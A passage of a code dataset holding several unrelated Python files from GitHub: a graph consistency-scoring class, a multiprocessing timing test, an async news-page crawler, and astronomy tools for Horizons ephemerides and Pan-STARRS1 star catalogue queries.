paths in the unlabeled graph\n        if len(unlabeled_nodes) == 1:\n            num_steps = 0\n\n        # [num_nodes, num_labels, num_steps]\n        nls = np.zeros([len(node_idx), self.num_classes, num_steps + 1], dtype=np.float32)\n        nlc = np.zeros([len(node_idx), self.num_classes, num_steps + 1], dtype=np.float32)\n        nlc[:, 0, :] = 1.0\n        for node in labeled_nodes:\n            n_idx = node_idx[node]\n            nlc[n_idx, :, :] = 1.0\n\n        self.propagate_seeds(labeled_nodes, unlabeled_nodes, graph, nls, nlc, node_labels, node_idx)\n\n        for s_idx in range(1, num_steps + 1):\n            self.propagate(unlabeled_nodes, graph, nls, nlc, s_idx, node_idx)\n\n        nls = nls.mean(axis=-1)\n        nls[:, 0] = nls[:, 1:].min()\n\n        return nls, node_idx\n\n\nclass MultiHopLogConsistencyScoring(MultiHopConsistencyScoring):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    def initialize(self, adj_list, seed_node_labels):\n        g = nx.Graph()\n        # list of (ex_t_id, ex_p_id, ex_tmp_energy)\n        # 0 - entail\n        # 1 - contradict\n        nodes = set()\n        unlabeled_nodes = []\n        labeled_nodes = []\n        node_idx = {}\n        for t_id, p_id, tp_r_dists in adj_list:\n            if t_id not in nodes:\n                node_idx[t_id] = len(node_idx)\n                if t_id in seed_node_labels:\n                    labeled_nodes.append(t_id)\n                else:\n                    unlabeled_nodes.append(t_id)\n            if p_id not in nodes:\n                node_idx[p_id] = len(node_idx)\n                if p_id in seed_node_labels:\n                    labeled_nodes.append(p_id)\n                else:\n                    unlabeled_nodes.append(p_id)\n\n            nodes.add(t_id)\n            nodes.add(p_id)\n            entail_weight, contradict_weight = tp_r_dists\n            entail_weight = -np.log(entail_weight.item())\n            contradict_weight = -np.log(contradict_weight.item())\n            g.add_edge(\n                t_id,\n                p_id,\n                entail_weight=entail_weight,\n                contradict_weight=contradict_weight,\n            )\n        return g, unlabeled_nodes, labeled_nodes, node_idx\n","repo_name":"Supermaxman/pytorch-gleam","sub_path":"pytorch_gleam/inference/consistency_scoring.py","file_name":"consistency_scoring.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"19413556417","text":"# some testing code around multiprocessing\r\n# https://www.youtube.com/watch?v=fKl2JW_qrso\r\n\r\nimport multiprocessing\r\nimport time\r\n\r\n\r\n# the function takes an argument called 'seconds'\r\ndef do_something(seconds):\r\n    print(f'Sleeping {seconds} second(s)....')\r\n    time.sleep(seconds)\r\n    print('done sleeping...')
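\r\n\r\n# With 10 processes each sleeping ~1.6 s, the whole run should finish in\r\n# roughly 1.6 s rather than ~16 s sequentially, since the sleeps overlap.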
clock/counter\r\n finish=time.perf_counter()\r\n\r\n #now substract the sfinish minus start, (essentially a stop watch)\r\n print(f'Finished in {round(finish-start,3)} second(s)')\r\n\r\n\r\nif __name__ == '__main__':\r\n # freeze_support()\r\n main()\r\n","repo_name":"12pints/Multiprocessing","sub_path":"multi_test.py","file_name":"multi_test.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40321917670","text":"\"\"\"\n 本模块内容功能是爬取腾讯新闻网页十篇新闻内容\n Get_news()类是获取新闻网页内容和新闻内容并将文字保存到本地。\n\"\"\"\nimport asyncio\nfrom aiohttp import ClientSession\nimport urllib.request\nfrom bs4 import BeautifulSoup\nfrom lxml import etree\nimport re\nimport tkinter.ttk\nfrom tkinter import ttk\nimport progressbar\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport logging\n\nlogger = logging.getLogger('pencil')\nlogger.setLevel(level=logging.DEBUG)\n# logging.basicConfig(format='%(levelname)s:%(funcName)s:%(message)s', level = logging.DEBUG)\nlog_path='log.log'\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler = logging.FileHandler(log_path, mode='a+', encoding='UTF-8')\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nclass Get_news(object):\n \"\"\"\n 获取新闻网页内容和新闻内容并将文字保存到本地\n \"\"\"\n def __init__(self,url):\n \"\"\" 初始化该类 \"\"\"\n # 输入新闻网页\n self.html = url # 新闻网址(需要更改)\n # self.html = \"https://news.sina.com.cn/china/\" # 新闻网址\n self.div_list = self.getnews_herf(self.html) # 调用函数获取新闻网页中的url的div标签。\n # 新建一个列表,存储具体的新闻url\n url_list = []\n # 循环判断列表中是否有空值\n for i in self.div_list:\n # 删除获得空值\n if i == '':\n div_list.remove(i)\n # 循环输入最新的30篇新闻url\n for div in self.div_list[0:31]:\n # xpath获得a标签中的新闻url\n url = div.xpath('./a/@href')[0]\n # 将url加入到之前创建的空列表\n url_list.append(url)\n # 任务列表对象tasks,利用循环将url_list中的每个url都进行爬取操作加入到tasks中 \n tasks = [asyncio.ensure_future(self.write_news(new_url)) for new_url in url_list]\n # 获取循环事件\n loop = asyncio.get_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.wait(tasks))\n # 关闭打开的新闻文本文档\n self.f.close()\n\n\n def getnews_herf(self,url):\n \"\"\"\n 获取网页中具体新闻的div标签列表\n \"\"\"\n # 获得新闻网站的响应数据\n html = urllib.request.urlopen(url).read()\n html = html.decode('utf-8')\n # 获取url的div标签\n tree = etree.HTML(html)\n div_list = tree.xpath('//div[@class=\"left-content-1 marBot\"]/div/ul/li')\n # 返回div列表\n return div_list\n\n async def write_news(self,new_url):\n # 打开文件\n self.f = open('news.txt','w',encoding='utf-8')\n async with ClientSession() as session:\n # 使用异步编程访问网页\n async with session.get(new_url) as response:\n # 输出日志,保存爬取网页url和时间\n logger.debug(f'{new_url} is done.')\n # 一次获取网页的响应,等待期间执行下一次响应(挂起操作)\n response = await response.text(encoding='utf-8')\n # bs_obj为网页信息\n bs_obj = BeautifulSoup(response, 'html.parser')\n # 获取网站内的

<p> 标签内容\n            downloadList = bs_obj.select('p')\n            # create an empty list to hold the news text\n            text_list = []\n            # match the qualifying <p> tag contents\n            text_re = re.compile(r'<p>(\\s+?\\S+?)</p>')\n            # print(downloadList)\n            for txt in downloadList:\n                # check each <p> tag in turn\n                html = \"{}\".format(txt)\n                # keep the matching contents, appending them to the text list\n                text_list += text_re.findall(html)\n            # suspend on the write to reduce response time\n            await self.write_file(text_list)\n\n    async def write_file(self, text_list):\n        # write the news text into the output file; findall() with a single\n        # group returns plain strings, so write txt itself (not txt[1])\n        for txt in text_list:\n            self.f.write(txt)\n            self.f.write('\\nCrawled at: ' + time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) + '\\n')\n            self.f.write('\\n')\n\nif __name__ == \"__main__\":\n    # the constructor requires a news-page URL; this is a hypothetical\n    # Tencent news start page\n    Get_news(\"https://news.qq.com/\")\n","repo_name":"ITApeDeHao/news_crawler","sub_path":"oldCrawler/Get.py","file_name":"Get.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"31805420755","text":"from warnings import warn\n\nimport numpy as np\nimport pandas as pd\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.table import Table, vstack\nfrom astropy.wcs import WCS\nfrom astroquery.jplhorizons import Horizons\nfrom astroquery.vizier import Vizier\n\n__all__ = [\"HorizonsDiscreteEpochsQuery\", \"organize_ps1_and_isnear\",\n           \"PanSTARRS1\", \"group_stars\", \"get_xy\", \"xyinFOV\",\n           \"panstarrs_query\"]\n\n\ndef mask_str(n_new, n_old, msg):\n    dn = n_old - n_new\n    print(f\"{n_new:3d} objects remaining: {dn:3d} masked \"\n          + f\"out of {n_old:3d} based on {msg:s}.\")\n\n\nclass HorizonsDiscreteEpochsQuery:\n    def __init__(self, targetname, location, epochs, id_type=\"smallbody\"):\n        '''\n        Parameters\n        ----------\n        targetname : str\n            Name, number, or designation of the object to be queried.\n        location : str or dict\n            Observer's location for ephemerides queries or center body\n            name for orbital element or vector queries. Uses the same\n            codes as JPL Horizons. If no location is provided, Earth's\n            center is used for ephemerides queries and the Sun's center\n            for elements and vectors queries. Arbitrary topocentric\n            coordinates for ephemerides queries can be provided in the\n            format of a dictionary. The dictionary has to be of the form\n            {``'lon'``: longitude in deg (East positive, West negative),\n            ``'lat'``: latitude in deg (North positive, South negative),\n            ``'elevation'``: elevation in km above the reference\n            ellipsoid, [``'body'``: Horizons body ID of the central\n            body; optional; if this value is not provided it is assumed\n            that this location is on Earth]}.\n        epochs : scalar, list-like, or dictionary\n            Either a list of epochs in JD or MJD format or a dictionary\n            defining a range of times and dates; the range dictionary\n            has to be of the form {``'start'``:'YYYY-MM-DD [HH:MM:SS]',\n            ``'stop'``:'YYYY-MM-DD [HH:MM:SS]',\n            ``'step'``:'n[y|d|m|s]'}. If no epochs are provided, the\n            current time is used.\n        id_type : str, optional\n            Identifier type, options:\n            ``'smallbody'``, ``'majorbody'`` (planets but also anything\n            that is not a small body), ``'designation'``, ``'name'``,\n            ``'asteroid_name'``, ``'comet_name'``, ``'id'`` (Horizons id\n            number), or ``'smallbody'`` (find the closest match under\n            any id_type), default: ``'smallbody'``\n        '''\n        self.targetname = str(targetname)\n        self.location = location\n        self.epochs = np.asarray(epochs)\n        self.id_type = id_type\n        self.query_table = None\n        self.uri = []\n\n    def __str__(self):\n        _str = \"Query {:s} at location {} for given discrete epochs.\"\n        return _str.format(self.targetname, self.location)\n\n    def query(self, depoch=100, *args, **kwargs):\n        '''\n        Parameters\n        ----------\n        depoch : int, optional\n            The number of discrete epochs per chopped query.\n\n        args, kwargs : optional.\n            Passed to ``.ephemerides()`` of ``Horizons``.\n        '''\n        Nepoch = np.shape(self.epochs)[0]\n        Nquery = (Nepoch - 1) // depoch + 1
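\n        # e.g. 250 epochs with depoch=100 gives Nquery = (250 - 1)//100 + 1 = 3\n        # chunks of 100, 100 and 50 epochs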
\n        tabs = []\n\n        print(f'Query: {self.targetname} at {self.location} for {Nepoch} epochs')\n\n        if Nquery > 1:\n            print(f\"Query chopped into {Nquery} chunks: Doing \",\n                  end=' ')\n\n        for i in range(Nquery):\n            print(f\"{i+1}...\", end=' ')\n            i_0 = i*depoch\n            i_1 = (i + 1)*depoch\n            epochs_i = self.epochs[i_0:i_1]\n\n            obj = Horizons(id=self.targetname,\n                           location=self.location,\n                           epochs=epochs_i,\n                           id_type=self.id_type)\n            eph = obj.ephemerides(*args, **kwargs)\n\n            tabs.append(eph)\n            self.uri.append(obj.uri)\n\n        if len(tabs) == 1:\n            self.query_table = tabs[0]\n\n        elif len(tabs) > 1:\n            self.query_table = vstack(tabs)\n\n        print(\"Query done.\")\n\n        return self.query_table\n\n\ndef organize_ps1_and_isnear(ps1, header=None, bezel=0,\n                            nearby_obj_minsep=0*u.deg, group_crit_separation=0,\n                            select_filter_kw={},\n                            del_flags=[0, 1, 2, 7, 8, 9, 10, 23, 24],\n                            drop_by_Kron=True,\n                            calc_JC=True):\n    ''' Organizes the PanSTARRS1 object and checks nearby objects.\n    Parameters\n    ----------\n    ps1 : `~PanSTARRS1`\n        The `~PanSTARRS1` object.\n\n    header : `astropy.header.Header`, None, optional\n        The header to extract WCS related information. If ``None``\n        (default), it will not drop any stars based on the field of view\n        criterion.\n\n    bezel : int, float, optional\n        The bezel used to select stars inside the field of view.\n\n    nearby_obj_minsep : float, `~astropy.Quantity`, optional.\n        If there is any object closer than this value, a warning message\n        will be printed.\n\n    group_crit_separation : float, optional\n        The critical separation parameter used in DAOGROUP algorithm\n        (`~photutils.DAOGroup`) to select grouped stars.\n\n    select_filter_kw : dict, optional\n        The kwargs for `~PanSTARRS1.select_filter()` method.\n\n    del_flags : list of int, optional\n        The flags to be used for dropping objects based on ``\"f_objID\"``\n        of Pan-STARRS1 query.\n\n    drop_by_Kron : bool, optional\n        If ``True`` (default), drop the galaxies based on the Kron\n        magnitude criterion suggested by PS1:\n        https://outerspace.stsci.edu/display/PANSTARRS/How+to+separate+stars+and+galaxies\n        which works well only if i <~ 21.\n\n    calc_JC : bool, optional\n        Whether to calculate the Johnson-Cousins B V R_C filter\n        magnitudes by the linear relationship given by Table 6 of Tonry\n        J. et al. 2012, ApJ, 750, 99., using g-r color. The following\n        columns will be added to the table ``ps1.queried``:\n\n        * ``\"C_gr\"``:\n            The ``g-r`` color.\n\n        * ``\"dC_gr\"``:\n            The total error of ``g-r`` color.
Not only the error-bar\n            of the mean PSF magnitude (``\"e_Xmag\"`` for filter\n            ``X=\"g\"`` and ``X=\"r\"``), but also the intrinsic\n            error-bar of each measurement (``\"XmagStd\"`` for filter\n            ``X=\"g\"`` and ``X=\"r\"``) are considered, i.e., four\n            error-bars are propagated by first order approximation\n            (square sum and square rooted).\n\n        * ``\"Bmag\"``, ``\"Vmag\"``, ``\"Rmag\"``:\n            ``B = g + 0.213 + 0.587(g-r) (+- 0.034)``\n            ``V = r + 0.006 + 0.474(g-r) (+- 0.012)``\n            ``R = r - 0.138 - 0.131(g-r) (+- 0.015)``\n        * ``\"dBmag\"``, ``\"dVmag\"``, ``\"dRmag\"``:\n            The total error of above magnitudes. The scatter\n            reported by Tonry et al. (e.g., 0.012 mag for V) is\n            propagated with the first order error estimated from the\n            magnitude calculation formula.\n\n    Returns\n    -------\n    isnear : bool\n        True if there is any nearby object from ``ps1.queried``.\n    '''\n\n    _ = ps1.query()\n\n    # Select only those within FOV & bezel.\n    # If you wanna keep those outside the edges, just set negative\n    # ``bezel``.\n    if header is not None:\n        ps1.select_xyinFOV(header=header, bezel=bezel)\n\n    # Check whether any object is near our target\n    isnear = ps1.check_nearby(minsep=nearby_obj_minsep)\n    if isnear:\n        warn(\"There are objects near the target!\")\n\n    # Drop objects near to each other\n    ps1.drop_star_groups(crit_separation=group_crit_separation)\n\n    # Drop for preparing differential photometry\n    ps1.drop_for_diff_phot(del_flags=del_flags, drop_by_Kron=drop_by_Kron)\n\n    # remove columns that are of no interest\n    ps1.select_filters(**select_filter_kw)\n\n    ps1.queried[\"_r\"] = ps1.queried[\"_r\"].to(u.arcsec)\n    ps1.queried[\"_r\"].format = \"%.3f\"\n\n    if calc_JC:\n        c_gr = ps1.queried[\"gmag\"] - ps1.queried[\"rmag\"]\n        ps1.queried[\"C_gr\"] = c_gr\n\n        # Since it includes Std, I used ``d``, inspired by the \"total\n        # derivative\" compared to partial derivative. Per the docstring,\n        # each band combines the mean-PSF error with the intrinsic Std.\n        var_g = ps1.queried[\"e_gmag\"]**2 + ps1.queried[\"gmagStd\"]**2\n        var_r = ps1.queried[\"e_rmag\"]**2 + ps1.queried[\"rmagStd\"]**2\n        dc_gr = np.sqrt(var_g + var_r)\n        ps1.queried[\"dC_gr\"] = dc_gr\n\n        pars = dict(Bmag=[0.213, 0.587, 0.034, \"gmag\", var_g],\n                    Vmag=[0.006, 0.474, 0.012, \"rmag\", var_r],\n                    Rmag=[-0.138, -0.131, 0.015, \"rmag\", var_r])\n        # filter_name = [B_0, B_1, B_sc of Tonry, mag used for conversion]\n        for k, p in pars.items():\n            ps1mag = ps1.queried[p[3]]\n            ps1.queried[k] = ps1mag + p[0] + p[1] * c_gr\n            ps1.queried[f\"d{k}\"] = np.sqrt(p[4] + p[1]*dc_gr**2 + p[2]**2)
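\n        # Worked check for a hypothetical star with g = 15.0, r = 14.5:\n        # C_gr = 0.5, so V = 14.5 + 0.006 + 0.474*0.5 = 14.743.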
\n\n    return isnear\n\n\n# TODO: Let it accept SkyCoord too\nclass PanSTARRS1:\n    def __init__(self, ra, dec, radius=None, inner_radius=None,\n                 width=None, height=None, columns=[\"**\", \"+_r\"],\n                 column_filters={}):\n        \"\"\" Query PanSTARRS @ VizieR using astroquery.vizier\n\n        Parameters\n        ----------\n        ra, dec, radius : float or `~astropy.Quantity`\n            The central RA, DEC and the cone search radius. If not\n            `~astropy.Quantity`, assuming it is in degrees unit.\n\n        inner_radius : float or `~astropy.Quantity`\n            When set in addition to ``radius``, the queried region\n            becomes annular, with outer radius ``radius`` and inner\n            radius ``inner_radius``. If not `~astropy.Quantity`,\n            assuming it is in degrees unit.\n\n        width : convertible to `~astropy.coordinates.Angle`\n            The width of the square region to query. If not\n            `~astropy.Quantity`, assuming it is in degrees unit.\n\n        height : convertible to `~astropy.coordinates.Angle`\n            When set in addition to ``width``, the queried region\n            becomes rectangular, with the specified ``width`` and\n            ``height``. If not `~astropy.Quantity`, assuming it is in\n            degrees unit.\n\n        columns : list of str, str in ['*', '**'], optional\n            The columns to be retrieved. The special column ``\"*\"``\n            requests just the default columns of a catalog; ``\"**\"``\n            (Default) would request all the columns. For sorting, use\n            ``\"+\"`` in front of the column name. See the documentation:\n            https://astroquery.readthedocs.io/en/latest/vizier/vizier.html#specifying-keywords-output-columns-and-constraints-on-columns\n\n        column_filters : dict, optional\n            The column filters for astroquery.vizier.\n            Example can be ``{\"gmag\":\"13.0..20.0\", \"e_gmag\":\"<0.10\"}``.\n\n        Return\n        ------\n        queried : astropy.table object\n            The queried result.\n\n        Note\n        ----\n        All columns: http://vizier.u-strasbg.fr/viz-bin/VizieR?-source=II/349\n        \"\"\"\n        _params = dict(ra=ra, dec=dec, radius=radius,\n                       inner_radius=inner_radius, width=width, height=height)\n\n        for k, v in _params.items():\n            if v is None:\n                continue\n            if not isinstance(v, u.Quantity):\n                warn(f\"{k} is not astropy Quantity: Assuming deg unit\")\n                _params[k] = v * u.deg\n        self.ra = _params[\"ra\"]\n        self.dec = _params[\"dec\"]\n        self.radius = _params[\"radius\"]\n        self.inner_radius = _params[\"inner_radius\"]\n        self.width = _params[\"width\"]\n        self.height = _params[\"height\"]\n\n        if isinstance(columns, str):\n            if columns in ['*', '**']:\n                self.columns = [columns]\n            else:\n                raise ValueError(\"If columns is str, it must be one of \"\n                                 + \"['*', '**']\")\n        else:\n            self.columns = columns\n\n        self.column_filters = column_filters\n\n    def query(self):\n        vquery = Vizier(columns=self.columns,\n                        column_filters=self.column_filters,\n                        row_limit=-1)\n\n        field = SkyCoord(ra=self.ra, dec=self.dec, frame='icrs')\n\n        self.queried = vquery.query_region(field,\n                                           radius=self.radius,\n                                           inner_radius=self.inner_radius,\n                                           width=self.width,\n                                           height=self.height,\n                                           catalog=\"II/349/ps1\")[0]\n\n        return self.queried\n\n    def select_xyinFOV(self, header=None, wcs=None, bezel=0, mode='all'):\n        ''' Convert RA/DEC to xy (add columns) with rejection at bezels.\n        Parameters\n        ----------\n        header : astropy.io.fits.Header, optional\n            The header to extract WCS information. One and only one of\n            ``header`` and ``wcs`` must be given.\n\n        wcs : astropy.wcs.WCS, optional\n            The WCS to convert the RA/DEC to XY. One and only one of\n            ``header`` and ``wcs`` must be given.\n\n        bezel : int or float, optional\n            The bezel size to exclude stars at the image edges. If you\n            want to keep some stars outside the edges, put negative\n            values (e.g., ``-5``).\n\n        mode : 'all' or 'wcs', optional\n            Whether to do the transformation including distortions\n            (``'all'``) or only the core WCS transformation (``'wcs'``).\n        '''\n        N_old = len(self.queried)\n        self.queried = xyinFOV(table=self.queried, header=header, wcs=wcs,\n                               ra_key=\"RAJ2000\", dec_key=\"DEJ2000\",\n                               bezel=bezel, origin=0, mode=mode)\n        N_new = len(self.queried)\n        mask_str(N_new, N_old, f\"{bezel}-pixel bezel\")\n\n    def drop_for_diff_phot(self, del_flags=[0, 1, 2, 7, 8, 9, 10, 23, 24],\n                           drop_by_Kron=True):\n        ''' Drop objects which are not good for differential photometry.\n        Parameters\n        ----------\n        del_flags : list of int, None, optional\n            The flags to be used for dropping objects based on\n            ``\"f_objID\"`` of Pan-STARRS1 query. These are the powers of\n            2 to identify the flag (e.g., 2 means ``2**2`` or flag\n            ``4``). See Note below for each flag.
Set it to ``None`` to\n keep all the objects based on ``\"f_objID\"``.\n\n drop_by_Kron : bool, optional\n If ``True`` (default), drop the galaxies based on the Kron\n magnitude criterion suggested by PS1:\n https://outerspace.stsci.edu/display/PANSTARRS/How+to+separate+stars+and+galaxies\n which works good only if i <~ 21.\n\n Note\n ----\n 1 (2^0) = Used within relphot (FEW); skip star.\n 2 = Used within relphot (POOR); skip star.\n 4 = object IDed with known ICRF quasar (may have ICRF\n position measurement)\n 8 = identified as likely QSO (Hernitschek+\n 2015ApJ...801...45H), PQSO≥0.60\n 16 = identified as possible QSO (Hernitschek+\n 2015ApJ...801...45H), PQSO≥0.05\n 32 = identified as likely RR Lyra (Hernitschek+\n 2015ApJ...801...45H), PRRLyra≥0.60\n 64 = identified as possible RR Lyra (Hernitschek+\n 2015ApJ...801...45H), PRRLyra≥0.05\n 128 = identified as a variable based on ChiSq (Hernitschek+\n 2015ApJ...801...45H)\n 256 = identified as a non-periodic (stationary) transient\n 512 = at least one detection identified with a known\n solar-system object (asteroid or other).\n 1024 (2^10) = most detections identified with a known\n solar-system object (asteroid or other).\n 2048 = star with large proper motion\n 4096 = simple weighted average position was used (no IRLS\n fitting)\n 8192 = average position was fitted\n 16384 = proper motion model was fitted\n 32768 = parallax model was fitted\n 65536 = average position used (not PM or PAR)\n 131072 = proper motion used (not AVE or PAR)\n 262144 = parallax used (not AVE or PM)\n 524288 = mean astrometry could not be measured\n 1048576 (2^20) = stack position used for mean astrometry\n 2097152 = mean astrometry used for stack position\n 4194304 = failure to measure proper-motion model\n 8388608 = extended in our data (eg, PS)\n 16777216 = extended in external data (eg, 2MASS)\n 33554432 = good-quality measurement in our data (eg,PS)\n 67108864 = good-quality measurement in external data (eg,\n 2MASS)\n 134217728 = good-quality object in the stack (>1 good stack\n measurement)\n 268435456 = the primary stack measurements are the best\n measurements\n 536870912 = suspect object in the stack (no more than 1 good\n measurement, 2 or more suspect or good stack\n measurement)\n 1073741824 (2^30) = poor-quality stack object (no more than\n 1 good or suspect measurement)\n\n Among the ``\"f_objID\"``, the following are better to be dropped\n because they are surely not usable for differential photometry:\n\n * 1, 2, 4, 128, 256, 512, 1024, 8388608, 16777216\n\n or in binary position (``del_flags``),\n\n * 0, 1, 2, 7, 8, 9, 10, 23, 24\n\n (plus maybe 2048(2^11) because centroiding may not work\n properly?)\n '''\n N_old = len(self.queried)\n if del_flags is not None:\n idx2remove = []\n for i, row in enumerate(self.queried):\n b_flag = list(f\"{row['f_objID']:031b}\")\n for bin_pos in del_flags:\n if b_flag[-bin_pos] == '1':\n idx2remove.append(i)\n self.queried.remove_rows(idx2remove)\n\n N_fobj = len(self.queried)\n mask_str(N_fobj, N_old, f\"f_objID ({del_flags})\")\n\n N_old = N_fobj\n\n if drop_by_Kron:\n dmag = (self.queried[\"imag\"] - self.queried[\"iKmag\"])\n mask = (dmag > 0.05)\n self.queried = self.queried[~mask]\n\n N_Kron = len(self.queried)\n mask_str(N_Kron, N_old, \"the Kron magnitude criterion\")\n\n def select_filters(self, filter_names=[\"g\", \"r\", \"i\"],\n keep_columns=[\"_r\", \"objID\", \"f_objID\",\n \"RAJ2000\", \"DEJ2000\", \"x\", \"y\"],\n n_mins=[0, 0, 0]):\n ''' Abridges the columns depending on the specified 
filters.\n '''\n if not isinstance(filter_names, (list, tuple, np.ndarray)):\n filter_names = [filter_names]\n\n n_mins = np.atleast_1d(n_mins)\n if n_mins.shape[0] == 1:\n n_mins = np.repeat(n_mins, len(filter_names))\n elif n_mins.shape[0] != len(filter_names):\n raise ValueError(\"n_mins must be length 1 or same length as \"\n f\"filter_names (now it's {len(filter_names)}).\")\n\n selected_columns = keep_columns\n toremove_columns = []\n\n for filt in filter_names:\n selected_columns.append(f\"N{filt}\")\n selected_columns.append(f\"{filt}mag\")\n selected_columns.append(f\"{filt}Kmag\")\n selected_columns.append(f\"{filt}Flags\")\n selected_columns.append(f\"{filt}PSFf\")\n selected_columns.append(f\"{filt}magStd\")\n selected_columns.append(f\"e_{filt}mag\")\n selected_columns.append(f\"e_{filt}Kmag\")\n selected_columns.append(f\"o_{filt}mag\")\n selected_columns.append(f\"b_{filt}mag\")\n selected_columns.append(f\"B_{filt}mag\")\n\n for c in self.queried.columns:\n if c not in selected_columns:\n toremove_columns.append(c)\n\n self.queried.remove_columns(toremove_columns)\n\n N_old = len(self.queried)\n\n for i, filt in enumerate(filter_names):\n mask = np.array(self.queried[f\"o_{filt}mag\"]) < n_mins[i]\n self.queried = self.queried[~mask]\n\n N_new = len(self.queried)\n mask_str(N_new, N_old, f\"o_{filter_names}mag >= {n_mins}\")\n\n def check_nearby(self, minsep, maxmag=None, filter_names=[\"r\"]):\n ''' Checkes whether there is any nearby object.\n Note\n ----\n It checks the ``\"_r\"`` column of the ``PanSTARRS1`` queried\n result. Therefore, the query center should be the position where\n you want to check for any nearby object.\n\n Parameters\n ----------\n minsep : float or `~astropy.Quantity`\n The minimum separation to detect nearby object\n maxmag : int or float, optional\n The maximum magnitude value to mask objects. Objects fainter\n than this magnitude (Mean PSF magnitude) will be accepted\n even though it is nearby the search center.\n '''\n if isinstance(minsep, (float, int)):\n warn(\"minsep is not Quantity. Assuming degree unit.\")\n minsep = minsep * u.deg\n elif not isinstance(minsep, u.Quantity):\n raise TypeError(\"minsep not understood.\")\n\n if not isinstance(filter_names, (list, tuple, np.ndarray)):\n filter_names = [filter_names]\n\n chktab = self.queried.copy()\n\n if maxmag is not None:\n for filt in filter_names:\n chktab = chktab[chktab[filt] <= maxmag]\n minsep = minsep.to(chktab[\"_r\"].unit).value\n isnear = (np.array(chktab[\"_r\"]).min() <= minsep)\n return isnear\n\n def drop_star_groups(self, crit_separation):\n N_old = len(self.queried)\n grouped_rows = group_stars(table=self.queried,\n crit_separation=crit_separation,\n xcol=\"x\", ycol=\"y\", index_only=True)\n self.queried.remove_rows(grouped_rows)\n N_new = len(self.queried)\n mask_str(N_new, N_old,\n (f\"DAOGROUP with {crit_separation:.3f}-pixel critical \"\n + \"separation.\"))\n\n\ndef group_stars(table, crit_separation, xcol=\"x\", ycol=\"y\", index_only=True):\n ''' Group stars using DAOGROUP algorithm and return row indices.\n Parameters\n ----------\n table: astropy.table.Table\n The queried result table.\n crit_separation: float or int\n Distance, in units of pixels, such that any two stars separated by\n less than this distance will be placed in the same group.\n xcol, ycol: str, optional\n The column names for x and y positions. 
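One caveat in ``select_filters`` above: ``selected_columns = keep_columns`` binds the same list object as the mutable default argument, so every name appended in the filter loop accumulates in that default list across calls. A defensive copy avoids it (one-line sketch):

    selected_columns = list(keep_columns)  # copy, so appends no longer mutate the default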
This is necessary since\n ``photutils.DAOGroup`` accepts a table which has x y positions\n designated as ``\"x_0\"`` and ``\"y_0\"``.\n index : bool, optional\n Whether to return only the index of the grouped rows (group\n information is lost) or the full grouped table (after group_by).\n\n Notes\n -----\n Assuming the psf fwhm to be known, ``crit_separation`` may be set to\n ``k * fwhm``, for some positive real k.\n\n See Also\n --------\n photutils.DAOStarFinder\n\n References\n ----------\n [1] Stetson, Astronomical Society of the Pacific, Publications,\n (ISSN 0004-6280), vol. 99, March 1987, p. 191-222.\n Available at: http://adsabs.harvard.edu/abs/1987PASP...99..191S\n\n Return\n ------\n gtab: Table\n Returned when ``index_only=False``.\n The table underwent ``.group_by(\"group_id\")``.\n\n grouped_rows: list\n Returned when ``index_only=True``.\n The indices of the rows which are \"grouped\" stars. You may remove\n such rows using ``table.remove_rows(grouped_rows)``.\n '''\n from photutils.psf.groupstars import DAOGroup\n tab = table.copy()\n\n tab[xcol].name = \"x_0\"\n tab[ycol].name = \"y_0\"\n gtab = DAOGroup(crit_separation=crit_separation)(tab).group_by(\"group_id\")\n if not index_only:\n return gtab\n else:\n gid, gnum = np.unique(gtab[\"group_id\"], return_counts=True)\n gmask = gid[gnum != 1] # group id with > 1 stars\n grouped_rows = []\n for i, gid in enumerate(gtab[\"group_id\"]):\n if gid in gmask:\n grouped_rows.append(i)\n return grouped_rows\n\n\ndef get_xy(header, ra, dec, unit=u.deg, origin=0, mode='all'):\n ''' Get image XY from the header WCS\n Parameters\n ----------\n header: astropy.io.fits.Header or pandas.DataFrame\n The header to extract WCS information.\n\n ra, dec: float or Quantity or array-like of such\n The coordinates to get XY position. If Quantity, ``unit`` will\n likely be ignored.\n\n unit: `~astropy.Quantity` or tuple of such\n Unit of the ``ra`` and ``dec`` given. It can be a tuple if they\n differ.\n\n origin: int, optional\n Whether to return 0 or 1-based pixel coordinates.\n\n mode: 'all' or 'wcs', optional\n Whether to do the transformation including distortions\n (``'all'``) or only including only the core WCS transformation\n (``'wcs'``).\n '''\n w = WCS(header)\n coo = SkyCoord(ra, dec, unit=unit)\n xy = SkyCoord.to_pixel(coo, wcs=w, origin=origin, mode=mode)\n return xy\n\n\ndef xyinFOV(table, header=None, wcs=None, ra_key='ra', dec_key='dec', bezel=0,\n origin=0, mode='all'):\n ''' Convert RA/DEC to pixel with rejection at bezels\n Parameters\n ----------\n header : astropy.io.fits.Header, optional\n The header to extract WCS information. One and only one of\n ``header`` and ``wcs`` must be given.\n\n wcs : astropy.wcs.WCS, optional\n The WCS to convert the RA/DEC to XY. One and only one of\n ``header`` and ``wcs`` must be given.\n\n table : astropy.table.Table or pandas.DataFrame\n The queried result table.\n\n ra_key, dec_key : str, optional\n The column names containing RA/DEC.\n\n bezel : int or float, optional\n The bezel size to exclude stars at the image edges. 
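A short usage sketch for ``group_stars`` with made-up coordinates: the two stars closer than ``crit_separation`` fall into one DAOGROUP group, so both of their row indices come back for removal. (The indices refer to the table after ``group_by("group_id")``, which can reorder rows if the group ids are not already sorted.)

    from astropy.table import Table

    tab = Table({"x": [10.0, 11.0, 50.0], "y": [10.0, 10.5, 50.0]})
    rows = group_stars(tab, crit_separation=5.0)
    print(rows)        # [0, 1] -- the close pair; the isolated star at (50, 50) survives
    tab.remove_rows(rows)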
